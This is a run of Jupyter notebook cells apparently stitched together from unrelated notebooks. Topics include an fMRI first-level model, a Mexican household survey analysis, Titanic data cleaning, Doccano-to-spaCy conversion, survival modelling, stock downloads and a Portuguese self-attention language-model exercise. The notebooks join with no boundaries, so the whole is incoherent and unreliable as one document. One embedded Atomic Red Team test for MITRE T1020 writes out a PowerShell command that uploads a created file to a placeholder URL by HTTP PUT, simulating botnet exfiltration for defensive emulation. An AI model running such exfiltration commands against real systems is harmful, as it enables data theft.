pipeline = pe.Workflow(name='first_level_model_{}_{}'.format(TASK_NAME.upper(),MODEL_NAME)) pipeline.base_dir = os.path.join(SUBJ_DIR, working_dir) pipeline.connect([(infosource, selectfiles, [('subject_id', 'subject_id'), ('resolution', 'resolution'), ('smoothing', 'smoothing') ]), (infosource, getsubjectinfo, [('subject_id', 'subject_id'), ('model_path', 'model_path') ]), (infosource, makecontrasts, [('subject_id', 'subject_id'), ('model_path', 'model_path') ]), (getsubjectinfo, makecontrasts, [('condition_names', 'condition_names')]), (getsubjectinfo, l1analysis, [('subject_info', 'modelspec.subject_info'), ('realign_params', 'modelspec.realignment_parameters')]), (makecontrasts, l1analysis, [('contrasts', 'conestimate.contrasts')]), (selectfiles, l1analysis, [('func', 'modelspec.functional_runs')]), (infosource, datasink, [('subject_id','container')]), (l1analysis, datasink, [('conestimate.spm_mat_file','@spm'), ('level1estimate.beta_images','@betas'), ('level1estimate.mask_image','@mask'), ('conestimate.spmT_images','@spmT'), ('conestimate.con_images','@con'), ('conestimate.spmF_images','@spmF') ]) ] )
Concentradohogar Analysis.
From a quick analysis of our concentradohogar dataframe, we can conclude that the households in our data sample have the following characteristics:
* The households in our dataset have **3** members on average.
* The typical head of household **only studied up to secondary school**, followed by those who completed primary school, and only **1.76% of our sample studied a postgraduate degree.**
* The average age of the head of household is **49** years, or roughly **50** years when rounded.
* The predominant household type in our sample is **nuclear**, meaning it consists of a single primary family group.
* The average number of people per household who receive monetary current income and have a job is **2**, and the average number of employed people aged 14 or older is also **2**.
* Most heads of household are men.
---
CODE:
import pandas as pd import seaborn as sns import matplotlib.pyplot as plt data = pd.read_csv('/content/conjunto_de_datos_concentradohogar_enigh_2018_ns.csv') data.sample(n=12)
---
**OBJECTIVE:** To continue our analysis of the [Concentradohogar](https://www.inegi.org.mx/temas/ingresoshog/) data, we want to characterize the typical Mexican household based on this dataset. The characteristics we are interested in (for now):
* **What is the education level of the head of household?**
* **What is the average number of people living in the households of our sample?**
* **What is the average age of the head of household?**
* **What is the most common household class?**
* **Are there more male or female heads of household?**
* **What is the average number of people working per household?**
* **How many overtime hours, on average, are worked in our sample?**
------
What does the average household in Mexico look like?
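Before walking through each variable with plots, the headline figures above can be reproduced in one place. This is a minimal sketch, assuming the same CSV and the column names used in the sections below (`tot_integ`, `edad_jefe`, `educa_jefe`, `clase_hog`, `perc_ocupa`, `ocupados`) and that those columns hold numeric codes/values:

```python
import pandas as pd

# Same file as loaded above (adjust the path if not running in Colab).
data = pd.read_csv('/content/conjunto_de_datos_concentradohogar_enigh_2018_ns.csv')

# Headline figures; assumes the columns are numeric.
overview = {
    'median household size (tot_integ)': data['tot_integ'].median(),
    'mean age of household head (edad_jefe)': data['edad_jefe'].mean(),
    'most common education code (educa_jefe)': data['educa_jefe'].mode()[0],
    'share with postgraduate studies, % (educa_jefe == 11)': (data['educa_jefe'] == 11).mean() * 100,
    'most common household class code (clase_hog)': data['clase_hog'].mode()[0],
    'mean income earners per household (perc_ocupa)': data['perc_ocupa'].mean(),
    'mean employed members aged 14+ (ocupados)': data['ocupados'].mean(),
}
for label, value in overview.items():
    print(f'{label}: {value}')
```

Each of these figures is examined in more detail, with a plot, in the sections that follow.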
Education completed by the head of household in Mexico.
Recall that the variable codes are the following:
* 1 - No schooling.
* 2 - Preschool.
* 3 - Incomplete primary school.
* 4 - Complete primary school.
* 5 - Incomplete secondary school.
* 6 - Complete secondary school.
* 7 - Incomplete high school (preparatoria).
* 8 - Complete high school (preparatoria).
* 9 - Incomplete university.
* 10 - Complete university.
* 11 - Postgraduate.
We plot this variable:
_ = sns.countplot(data['educa_jefe'])
/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning: Pass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation. FutureWarning
We can see that most heads of household only studied up to secondary school, followed by those who completed primary school, and only **1.76%** of our sample studied a postgraduate degree.
What is the average number of people living in Mexican households?
To answer this question we use the variable `tot_integ`, which contains the number of people belonging to the household, excluding domestic workers, their relatives, and guests.
sns.set() _ = sns.countplot(data['tot_integ'],color='#2ecc71') _ = plt.xlabel('Total de integrantes en vivienda') plt.show()
/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning: Pass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation. FutureWarning
We check the median:
data['tot_integ'].median()
So we have another shared characteristic of our sample: the households in our dataset are made up of 3 members on average.
What is the average age of the head of household?
We want to know the average age of the head of household, so we plot the distribution and compute its mean.
_ = sns.distplot(data['edad_jefe'],color='#3ddc93') plt.show() mean = data['edad_jefe'].mean() print('La media muestral es: {}'.format(mean))
La media muestral es: 49.79609361394296
We can see that the average age of heads of household is 49 years, or roughly 50 when rounded. So we have another fact: the average age of the head of household is about 50 years.
What is the most common household class?
The goal of this question is to distinguish households by the type of blood, legal, affinity, or customary relationship. They are classified as:
* **Unipersonal**: a household formed by a single person, who is the head.
* **Nuclear**: a household made up of a single primary family group.
* **Ampliado** (extended): a household formed by the head and their primary family group plus other family groups or relatives.
* **Compuesto** (composite): a nuclear or extended household plus people unrelated to the head.
* **Corresidiente** (co-resident): a household formed by two or more people who are not related to the head.
sns.set() _ = sns.countplot(data['clase_hog'],palette='cool') _ = plt.xlabel('Clase hogar') _ = plt.ylabel('count') _ = plt.title('diagrama de frecuencia de la clase hogar.') plt.show()
/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning: Pass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation. FutureWarning
Note that category 2 is the most frequent. What does that tell us? It tells us that the predominant household type in our sample is nuclear, meaning it is made up of a single primary family group.
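The same conclusion can be checked numerically instead of reading it off the bar chart. A small sketch, assuming `clase_hog` uses numeric codes 1–5 in the order of the classification above (the notebook itself only confirms that code 2 corresponds to the nuclear household):

```python
import pandas as pd

data = pd.read_csv('/content/conjunto_de_datos_concentradohogar_enigh_2018_ns.csv')

# Assumed code-to-name mapping; only 2 = Nuclear is confirmed by the plot above.
class_names = {1: 'Unipersonal', 2: 'Nuclear', 3: 'Ampliado',
               4: 'Compuesto', 5: 'Corresidiente'}

# Share of each household class as a percentage of the sample.
shares = (data['clase_hog']
          .map(class_names)                 # unmapped codes become NaN and are excluded
          .value_counts(normalize=True)
          .mul(100)
          .round(2))
print(shares)
```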
What is the average number of people working per household?
To answer this question we use the variables `ocupados` and `perc_ocupa`.
percep = round(data['perc_ocupa'].mean()) ocupados = round(data['ocupados'].mean()) print(percep) print(ocupados)
2 2
We can see that the average number of people who receive monetary current income and have a job is 2, and the average number of employed people aged 14 or older is also 2.
Are there more male or female heads of household?
_ = sns.countplot(data['sexo_jefe'])
Data summary: dimensions and structure
import pandas as pd import os mainpath = "C:/Users/francisco/Documents/GitHub/python-ml-course/datasets" filename = "titanic/titanic3.csv" fullpath = os.path.join(mainpath, filename) # The path can also be built by concatenating strings: mainpath + "/" + filename
data = pd.read_csv(fullpath) data.head(10) data.tail(10) data.shape data.columns.values
Summary of the basic statistics of the numeric variables
data.describe() data.dtypes
Missing Values
pd.isnull(data["body"]) pd.notnull(data["body"]) pd.isnull(data["body"]).values.ravel().sum() pd.notnull(data["body"]).values.ravel().sum()
Missing values in a dataset can come from two sources:
* Data extraction
* Data collection
Dropping missing values
data.dropna(axis=0, how="all") # axis=0 drops rows and axis=1 drops columns; `how` sets the condition to apply
data2 = data data2.dropna(axis=0, how="any")
Imputing missing values
data3 = data data3.fillna(0) data4 = data data4 = data4.fillna("Desconocido") data5 = data data5["body"] = data5["body"].fillna(0) data5["home.dest"] = data5["home.dest"].fillna("Desconocido") data5.head() data5["age"].fillna(data5["age"].mean()) data5 data5["age"].fillna(method="ffill") # fills with the previous non-null value; "bfill" uses the next non-null value further down
Dummy Variables
data["sex"] dummy_sex = pd.get_dummies(data["sex"], prefix="sex") dummy_sex column_names = data.columns.values.tolist() column_names data.drop(["sex"], axis=1) pd.concat([data, dummy_sex], axis = 1) def createDummies(df, var_name): dummies = pd.get_dummies(df[var_name], prefix=var_name) df = df.drop(var_name, axis=1) df = pd.concat([df, dummies], axis=1) return df createDummies(data3, "sex")
Doccano JSONL to spaCy v2.0 JSON format
Data exported from Doccano is usually in JSONL format and references entities in the text differently from the spaCy v2.0 method. So far I haven't found a way to directly convert Doccano-formatted data into a format ready for spaCy v3.0, so converting to v2.0 as an intermediate step will have to do for now.
Import JSON and Random
import json import random
Use json.loads() to handle the JSONL file. 
Then, for each line, reorganise data and labels into the spaCy *[text, {"entities":label}]* format.results = [] with open("../../data/doccano_annotated_data/edited_annotations.jsonl") as annotations_in_jsonl: for line in annotations_in_jsonl: j_line=json.loads(line) # Reorganise data to spaCy's [text, {"entities":label}] format line_results = [j_line['data'], {"entities":j_line['label']}] results.append(line_results)Shuffle the datasets, then split to training and validation data in an 80:20 ratiorandom.shuffle(results) train_data_end_index = int(len(results) - (len(results) / 5)) validation_data_start_index = int(len(results) - (len(results) / 5) + 1) final_index = int(len(results) - 1) training_set = results[0:train_data_end_index] validation_set = results[validation_data_start_index:final_index] print(len(training_set), len(validation_set))1280 318Save to JSON file for further conversion to spaCy v3.0 formatsave_data_path = "../../data/training_datasets/" def save_data(file, data): with open (save_data_path + file, "w", encoding="utf-8") as f: json.dump(data, f, indent=4) save_data("full_train_data_doccano.json", results) save_data("training_set_doccano.json", training_set) save_data("validation_set_doccano.json", validation_set)DSM on SUPPORT Dataset The SUPPORT dataset comes from the Vanderbilt University studyto estimate survival for seriously ill hospitalized adults.(Refer to http://biostat.mc.vanderbilt.edu/wiki/Main/SupportDesc.for the original datasource.)In this notebook, we will apply Deep Survival Machines for survival prediction on the SUPPORT data. Load the SUPPORT DatasetThe package includes helper functions to load the dataset.X represents an np.array of features (covariates),T is the event/censoring times and,E is the censoring indicator.import sys import os path = "/home/ubuntu/" sys.path.append(os.path.join(path, "DeepSurvivalMachines")) from dsm import datasets x, t, e = datasets.load_dataset('SUPPORT')Compute horizons at which we evaluate the performance of DSMSurvival predictions are issued at certain time horizons. Here we will evaluate the performanceof DSM to issue predictions at the 25th, 50th and 75th event time quantile as is standard practice in Survival Analysis.import numpy as np horizons = [0.25, 0.5, 0.75] times = np.quantile(t[e==1], horizons).tolist()Splitting the data into train, test and validation setsWe will train DSM on 70% of the Data, use a Validation set of 10% for Model Selection and report performance on the remaining 20% held out test set.n = len(x) tr_size = int(n*0.70) vl_size = int(n*0.10) te_size = int(n*0.20) x_train, x_test, x_val = x[:tr_size], x[-te_size:], x[tr_size:tr_size+vl_size] t_train, t_test, t_val = t[:tr_size], t[-te_size:], t[tr_size:tr_size+vl_size] e_train, e_test, e_val = e[:tr_size], e[-te_size:], e[tr_size:tr_size+vl_size]Setting the parameter gridLets set up the parameter grid to tune hyper-parameters. 
We will tune the number of underlying survival distributions, ($K$), the distribution choices (Log-Normal or Weibull), the learning rate for the Adam optimizer between $1\times10^{-3}$ and $1\times10^{-4}$ and the number of hidden layers between $0, 1$ and $2$.from sklearn.model_selection import ParameterGrid param_grid = {'k' : [3, 4, 6], 'distribution' : ['LogNormal', 'Weibull'], 'learning_rate' : [ 1e-4, 1e-3], 'layers' : [ [], [100], [100, 100] ] } params = ParameterGrid(param_grid)Model Training and Selectionfrom dsm import DeepSurvivalMachines models = [] for param in params: model = DeepSurvivalMachines(k = param['k'], distribution = param['distribution'], layers = param['layers']) # The fit method is called to train the model model.fit(x_train, t_train, e_train, iters = 100, learning_rate = param['learning_rate']) models.append([[model.compute_nll(x_val, t_val, e_val), model]]) best_model = min(models) model = best_model[0][1]12%|█████████▌ | 1242/10000 [00:02<00:19, 449.58it/s] 100%|█████████████████████████████████████████████████████████████████████████████████| 100/100 [00:12<00:00, 7.96it/s] 12%|█████████▌ | 1242/10000 [00:01<00:13, 628.37it/s] 37%|██████████████████████████████▎ | 37/100 [00:05<00:08, 7.11it/s] 12%|█████████▌ | 1242/10000 [00:02<00:14, 619.24it/s] 81%|██████████████████████████████████████████████████████████████████▍ | 81/100 [00:11<00:02, 7.08it/s] 12%|█████████▌ | 1242/10000 [00:01<00:13, 635.02it/s] 17%|█████████████▉ | 17/100 [00:02<00:13, 6.19it/s] 12%|█████████▌ [...]Inferenceout_risk = model.predict_risk(x_test, times) out_survival = model.predict_survival(x_test, times)EvaluationWe evaluate the performance of DSM in its discriminative ability (Time Dependent Concordance Index and Cumulative Dynamic AUC) as well as Brier Score.from sksurv.metrics import concordance_index_ipcw, brier_score, cumulative_dynamic_auc cis = [] brs = [] et_train = np.array([(e_train[i], t_train[i]) for i in range(len(e_train))], dtype = [('e', bool), ('t', float)]) et_test = np.array([(e_test[i], t_test[i]) for i in range(len(e_test))], dtype = [('e', bool), ('t', float)]) et_val = np.array([(e_val[i], t_val[i]) for i in range(len(e_val))], dtype = [('e', bool), ('t', float)]) for i, _ in enumerate(times): cis.append(concordance_index_ipcw(et_train, et_test, out_risk[:, i], times[i])[0]) brs.append(brier_score(et_train, et_test, out_survival, times)[1]) roc_auc = [] for i, _ in enumerate(times): roc_auc.append(cumulative_dynamic_auc(et_train, et_test, out_risk[:, i], times[i])[0]) for horizon in enumerate(horizons): print(f"For {horizon[1]} quantile,") print("TD Concordance Index:", cis[horizon[0]]) print("Brier Score:", brs[0][horizon[0]]) print("ROC AUC ", roc_auc[horizon[0]][0], "\n")For 0.25 quantile, TD Concordance Index: 0.7599725448387127 Brier Score: 0.11117671231416189 ROC AUC 0.7702921720225825 For 0.5 quantile, TD Concordance Index: 0.7042284595815174 Brier Score: 0.18256319957426942 ROC AUC 0.7249247111486091 For 0.75 quantile, TD Concordance Index: 0.6595517112307617 Brier Score: 0.2214871248399886 ROC AUC 0.7139686193735991T1020 - Automated ExfiltrationAdversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. 
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). Atomic Tests#Import the Module before running the tests. # Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts. Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - ForceAtomic Test 1 - IcedID Botnet HTTP PUTCreates a text fileTries to upload to a server via HTTP PUT method with ContentType HeaderDeletes a created file**Supported Platforms:** windows Attack Commands: Run with `powershell````powershell$fileName = "C:\temp\T1020_exfilFile.txt"$url = "https://google.com"$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"$contentType = "application/octet-stream"try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}```Invoke-AtomicTest T1020 -TestNumbers 1Save Stock Data to csv file Simple save one ticker to csvimport numpy as np import matplotlib.pyplot as plt import pandas as pd import warnings warnings.filterwarnings("ignore") # fix_yahoo_finance is used to fetch data import fix_yahoo_finance as yf yf.pdr_override() # input symbol = 'AMD' start = '2014-01-01' end = '2019-01-01' # Read data dataset = yf.download(symbol,start,end) # View Columns dataset.head() # Output data into CSV # To save in your certain folder, change the Users name dataset.to_csv("C:/Users/Finance/Desktop/AMD.csv")Save Multi Stocks of "Adj Close" to csvsymbols = ['MMM','AXP','AAPL','BA','CAT','CVX','CSCO','KO','DIS','XOM','GE','GS','HD','IBM','INTC','JNJ','MCD','MRK','NKE','PFE','PG','UTX','UNH','VZ','V','WMT'] start = '2001-01-11' end = '2018-09-17' stocks_info = yf.download(symbols, start, end)['Adj Close'] stocks_data = stocks_info.iloc[::] stocks_data.head() # Output data into CSV stocks_data.to_csv("C:/Users/Finance/Desktop/stocks_data.csv")To find the path or current diectoryimport os cwd = os.getcwd() cwd from pathlib import Path print(Path.cwd())C:\WINDOWSnome = '' print(f'Meu nome é {nome}')Meu nome é Exercício: Modelo de Linguagem com auto-atenção Este exercício é similar ao da Aula 7, mas iremos agora treinar uma rede neural *com auto-atenção* para prever a próxima palavra de um texto, data as palavras anteriores como entrada. Na camada de auto-atenção, não se esqueça de implementar:- Embeddings de posição- Projeções lineares (WQ, WK, WV, WO)- Conexões residuais- Camada de feed forward (2-layer MLP)O dataset usado neste exercício (BrWaC) possui um tamanho razoável e você vai precisar rodar seus experimentos com GPU.Alguns conselhos úteis:- **ATENÇÃO:** o dataset é bem grande. Não dê comando de imprimí-lo.- Durante a depuração, faça seu dataset ficar bem pequeno, para que a depuração seja mais rápida e não precise de GPU. Somente ligue a GPU quando o seu laço de treinamento já está funcionando- Não deixe para fazer esse exercício na véspera. Ele é trabalhoso.# iremos utilizar a biblioteca dos transformers para ter acesso ao tokenizador do BERT. 
!pip install transformersLooking in indexes: https://pypi.org/simple, https://us-python.pkg.dev/colab-wheels/public/simple/ Collecting transformers Downloading transformers-4.19.2-py3-none-any.whl (4.2 MB)  |████████████████████████████████| 4.2 MB 4.8 MB/s [?25hCollecting pyyaml>=5.1 Downloading PyYAML-6.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl (596 kB)  |████████████████████████████████| 596 kB 29.1 MB/s [?25hRequirement already satisfied: regex!=2019.12.17 in /usr/local/lib/python3.7/dist-packages (from transformers) (2019.12.20) Requirement already satisfied: tqdm>=4.27 in /usr/local/lib/python3.7/dist-packages (from transformers) (4.64.0) Requirement already satisfied: requests in /usr/local/lib/python3.7/dist-packages (from transformers) (2.23.0) Collecting tokenizers!=0.11.3,<0.13,>=0.11.1 Downloading tokenizers-0.12.1-cp37-cp37m-manylinux_2_12_x86_64.manylinux2010_x86_64.whl (6.6 MB)  |█████████████████████████████[...]Importação dos pacotesimport collections import itertools import functools import math import random import torch import torch.nn as nn import numpy as np from torch.utils.data import DataLoader from tqdm import tqdm_notebook # Check which GPU we are using !nvidia-smi if torch.cuda.is_available(): dev = "cuda:0" else: dev = "cpu" device = torch.device(dev) print('Using {}'.format(device))Using cuda:0Implementação do MyDatasetfrom typing import List def tokenize(text: str, tokenizer): return tokenizer(text, return_tensors=None, add_special_tokens=False).input_ids class MyDataset(): def __init__(self, texts: List[str], tokenizer, context_size: int): self.tokensIds_n = [] self.y = [] for text in tqdm_notebook(texts): tokens_ids = tokenize(text, tokenizer) if len(tokens_ids) < context_size + 1: continue for i in range(len(tokens_ids)-context_size): self.tokensIds_n.append(tokens_ids[i:i+context_size]) self.y.append(tokens_ids[i+context_size]) def __len__(self): return len(self.tokensIds_n) def __getitem__(self, idx): return torch.tensor(self.tokensIds_n[idx]).long(), torch.tensor(self.y[idx]).long()Testando se a implementação do MyDataset está corretafrom transformers import BertTokenizer tokenizer = BertTokenizer.from_pretrained("neuralmind/bert-base-portuguese-cased") dummy_texts = ['Eu gosto de correr', 'Ela gosta muito de comer pizza'] dummy_dataset = MyDataset(texts=dummy_texts, tokenizer=tokenizer, context_size=3) dummy_loader = DataLoader(dummy_dataset, batch_size=6, shuffle=False) assert len(dummy_dataset) == 5 print('passou no assert de tamanho do dataset') first_batch_input, first_batch_target = next(iter(dummy_loader)) correct_first_batch_input = torch.LongTensor( [[ 3396, 10303, 125], [ 1660, 5971, 785], [ 5971, 785, 125], [ 785, 125, 1847], [ 125, 1847, 13779]]) correct_first_batch_target = torch.LongTensor([13239, 125, 1847, 13779, 15616]) assert torch.equal(first_batch_input, correct_first_batch_input) print('Passou no assert de input') assert torch.equal(first_batch_target, correct_first_batch_target) print('Passou no assert de target')Carregamento do dataset Iremos usar uma pequena amostra do dataset [BrWaC](https://www.inf.ufrgs.br/pln/wiki/index.php?title=BrWaC) para treinar e avaliar nosso modelo de linguagem.!wget -nc https://storage.googleapis.com/unicamp-dl/ia025a_2022s1/aula7/sample_brwac.txt # Load datasets context_size = 9 valid_examples = 100 test_examples = 100 texts = open('sample_brwac.txt').readlines() # print('Truncating for debugging purposes.') # texts = texts[:500] training_texts 
= texts[:-(valid_examples + test_examples)] valid_texts = texts[-(valid_examples + test_examples):-test_examples] test_texts = texts[-test_examples:] training_dataset = MyDataset(texts=training_texts, tokenizer=tokenizer, context_size=context_size) valid_dataset = MyDataset(texts=valid_texts, tokenizer=tokenizer, context_size=context_size) test_dataset = MyDataset(texts=test_texts, tokenizer=tokenizer, context_size=context_size) print(f'training examples: {len(training_dataset)}') print(f'valid examples: {len(valid_dataset)}') print(f'test examples: {len(test_dataset)}') class LanguageModel(torch.nn.Module): def __init__(self, vocab_size, context_size, embedding_dim): """ Implements the Self-attention, decoder-only." Args: vocab_size (int): Size of the input vocabulary. context_size (int): Size of the sequence to consider as context for prediction. embedding_dim (int): Dimension of the embedding layer for each word in the context. """ # Escreva seu código aqui. super().__init__() self.vocab_size = vocab_size self.context_size = context_size self.embedding_dim = embedding_dim # C() self.C_w = nn.Embedding(vocab_size, embedding_dim) # P() self.P_w = nn.Embedding(context_size, embedding_dim) self.K_w = nn.Linear(embedding_dim, embedding_dim , bias=False) self.Q_w = nn.Linear(embedding_dim, embedding_dim , bias=False) self.V_w = nn.Linear(embedding_dim, embedding_dim , bias=False) self.E_w = nn.Linear(embedding_dim, embedding_dim , bias=False) hidden_size = 2*embedding_dim self.linear1 = nn.Linear(embedding_dim, hidden_size) self.relu1 = nn.ReLU() # self.linear2 = nn.Linear(hidden_size, hidden_size) # self.downsample = nn.Conv1d(1, 1, kernel_size=1, stride=1, padding=0, groups=1, bias=False, dilation=1) # self.relu2 = nn.ReLU() self.linear3 = nn.Linear(hidden_size, vocab_size, bias=False) self.softmax = nn.Softmax(dim=-1) def forward(self, inputs): """ Args: inputs is a LongTensor of shape (batch_size, context_size) Returns: logits of shape (batch_size, vocab_size) """ # Escreva seu código aqui. C_emb = self.C_w(inputs) P_emb = self.P_w(torch.LongTensor(range(0,self.context_size)).to(inputs.device)).unsqueeze(0) X = C_emb + P_emb X_end = X[:,-1,:].unsqueeze(1) Q = self.Q_w(X_end) K = self.K_w(X) V = self.V_w(X) scores = torch.matmul(Q, torch.transpose(K,1,2))/math.sqrt(self.embedding_dim) probs = self.softmax(scores) E = torch.matmul(probs, V) E = self.E_w(E) E = E + X_end # identity = self.downsample(E) out = E.squeeze(1) # identity = identity.squeeze(1) out = self.linear1(out) out = self.relu1(out) # out = self.linear2(out) # out = out + identity # out = self.relu2(out) out = self.linear3(out) return outTeste o modelo com um exemplomodel = LanguageModel( vocab_size=tokenizer.vocab_size, context_size=context_size, embedding_dim=64, ).to(device) sample_train, _ = next(iter(DataLoader(training_dataset))) sample_train_gpu = sample_train.to(device) model(sample_train_gpu).shape num_params = sum(p.numel() for p in model.parameters() if p.requires_grad) print(f'Number of model parameters: {num_params}')Number of model parameters: 3834752Assert da Perplexidaderandom.seed(123) np.random.seed(123) torch.manual_seed(123) def perplexity(logits, target): """ Computes the perplexity. 
Args: logits: a FloatTensor of shape (batch_size, vocab_size) target: a LongTensor of shape (batch_size,) Returns: A float corresponding to the perplexity """ loss = nn.functional.cross_entropy(logits, target, reduction='mean') return torch.exp(loss) n_examples = 1000 sample_train, target_token_ids = next(iter(DataLoader(training_dataset, batch_size=n_examples))) sample_train_gpu = sample_train.to(device) target_token_ids = target_token_ids.to(device) logits = model(sample_train_gpu) my_perplexity = perplexity(logits=logits, target=target_token_ids) print(f'my perplexity: {int(my_perplexity)}') print(f'correct initial perplexity: {tokenizer.vocab_size}') assert math.isclose(my_perplexity, tokenizer.vocab_size, abs_tol=7000) print('Passou o no assert da perplexidade')my perplexity: 30074 correct initial perplexity: 29794 Passou o no assert da perplexidadeLaço de Treinamento e Validaçãomax_examples = 100_000_000 eval_every_steps = 10000 lr = 3e-4 model = LanguageModel( vocab_size=tokenizer.vocab_size, context_size=context_size, embedding_dim=128, ).to(device) train_loader = DataLoader(training_dataset, batch_size=512, shuffle=True, drop_last=True) validation_loader = DataLoader(valid_dataset, batch_size=512) optimizer = torch.optim.Adam(model.parameters(), lr=lr) def train_step(input, target): model.train() model.zero_grad() logits = model(input.to(device)) loss = nn.functional.cross_entropy(logits, target.to(device)) loss.backward() optimizer.step() return loss.item() def validation_step(input, target): model.eval() logits = model(input) loss = nn.functional.cross_entropy(logits, target) return loss.item() train_losses = [] n_examples = 0 step = 0 while n_examples < max_examples: for input, target in train_loader: loss = train_step(input.to(device), target.to(device)) train_losses.append(loss) if step % eval_every_steps == 0: train_ppl = np.exp(np.average(train_losses)) with torch.no_grad(): valid_ppl = np.exp(np.average([ validation_step(input.to(device), target.to(device)) for input, target in validation_loader])) print(f'{step} steps; {n_examples} examples so far; train ppl: {train_ppl:.2f}, valid ppl: {valid_ppl:.2f}') train_losses = [] n_examples += len(input) # Increment of batch size step += 1 if n_examples >= max_examples: break0 steps; 0 examples so far; train ppl: 29067.98, valid ppl: 28321.16 10000 steps; 5120000 examples so far; train ppl: 629.79, valid ppl: 379.95 20000 steps; 10240000 examples so far; train ppl: 317.63, valid ppl: 280.73 30000 steps; 15360000 examples so far; train ppl: 259.40, valid ppl: 245.46 40000 steps; 20480000 examples so far; train ppl: 236.11, valid ppl: 227.57 50000 steps; 25600000 examples so far; train ppl: 221.79, valid ppl: 217.68 60000 steps; 30720000 examples so far; train ppl: 205.78, valid ppl: 211.25 70000 steps; 35840000 examples so far; train ppl: 198.29, valid ppl: 207.45 80000 steps; 40960000 examples so far; train ppl: 196.59, valid ppl: 203.15 90000 steps; 46080000 examples so far; train ppl: 194.90, valid ppl: 200.05 100000 steps; 51200000 examples so far; train ppl: 192.93, valid ppl: 197.45 110000 steps; 56320000 examples so far; train ppl: 188.81, valid ppl: 196.00 120000 steps; 61440000 examples so far; train ppl: 178.76, valid ppl: 194.74 130000 steps; 665[...]Avaliação final no dataset de testeBonus: o modelo com menor perplexidade no dataset de testes ganhará 0.5 ponto na nota final.test_loader = DataLoader(test_dataset, batch_size=64) with torch.no_grad(): test_ppl = np.exp(np.average([ validation_step(input.to(device), 
target.to(device)) for input, target in test_loader ])) print(f'test perplexity: {test_ppl}')test perplexity: 172.5462837789276Teste seu modelo com uma sentençaEscolha uma sentença gerada pelo modelo que ache interessante.prompt = 'Eu gosto de comer pizza pois me faz' max_output_tokens = 20 model.eval() for _ in range(max_output_tokens): input_ids = tokenize(text=prompt, tokenizer=tokenizer) input_ids_truncated = input_ids[-context_size:] # Usamos apenas os últimos tokens como entrada para o modelo. logits = model(torch.LongTensor([input_ids_truncated]).to(device)) # Ao usarmos o argmax, a saída do modelo em cada passo é o token de maior probabilidade. # Isso se chama decodificação gulosa (greedy decoding). predicted_id = torch.argmax(logits).item() input_ids += [predicted_id] # Concatenamos a entrada com o token escolhido nesse passo. prompt = tokenizer.decode(input_ids) print(prompt) prompt = 'Eu gosto de comer pizza do norte do' max_output_tokens = 20 model.eval() for _ in range(max_output_tokens): input_ids = tokenize(text=prompt, tokenizer=tokenizer) input_ids_truncated = input_ids[-context_size:] # Usamos apenas os últimos tokens como entrada para o modelo. logits = model(torch.LongTensor([input_ids_truncated]).to(device)) # Ao usarmos o argmax, a saída do modelo em cada passo é o token de maior probabilidade. # Isso se chama decodificação gulosa (greedy decoding). predicted_id = torch.argmax(logits).item() input_ids += [predicted_id] # Concatenamos a entrada com o token escolhido nesse passo. prompt = tokenizer.decode(input_ids) print(prompt) prompt = 'Os dias são mais bonitos perto de casa da' max_output_tokens = 20 model.eval() for _ in range(max_output_tokens): input_ids = tokenize(text=prompt, tokenizer=tokenizer) input_ids_truncated = input_ids[-context_size:] # Usamos apenas os últimos tokens como entrada para o modelo. logits = model(torch.LongTensor([input_ids_truncated]).to(device)) # Ao usarmos o argmax, a saída do modelo em cada passo é o token de maior probabilidade. # Isso se chama decodificação gulosa (greedy decoding). predicted_id = torch.argmax(logits).item() input_ids += [predicted_id] # Concatenamos a entrada com o token escolhido nesse passo. prompt = tokenizer.decode(input_ids) print(prompt) prompt = 'Praticar exercícios todos os dias melhora o ' max_output_tokens = 20 model.eval() for _ in range(max_output_tokens): input_ids = tokenize(text=prompt, tokenizer=tokenizer) input_ids_truncated = input_ids[-context_size:] # Usamos apenas os últimos tokens como entrada para o modelo. logits = model(torch.LongTensor([input_ids_truncated]).to(device)) # Ao usarmos o argmax, a saída do modelo em cada passo é o token de maior probabilidade. # Isso se chama decodificação gulosa (greedy decoding). predicted_id = torch.argmax(logits).item() input_ids += [predicted_id] # Concatenamos a entrada com o token escolhido nesse passo. prompt = tokenizer.decode(input_ids) print(prompt)Praticar exercícios todos os dias melhora o que Praticar exercícios todos os dias melhora o que se Praticar exercícios todos os dias melhora o que se refere Praticar exercícios todos os dias melhora o que se refere a Praticar exercícios todos os dias melhora o que se refere a sua Praticar exercícios todos os dias melhora o que se refere a sua vida Praticar exercícios todos os dias melhora o que se refere a sua vida. Praticar exercícios todos os dias melhora o que se refere a sua vida. O Praticar exercícios todos os dias melhora o que se refere a sua vida. 
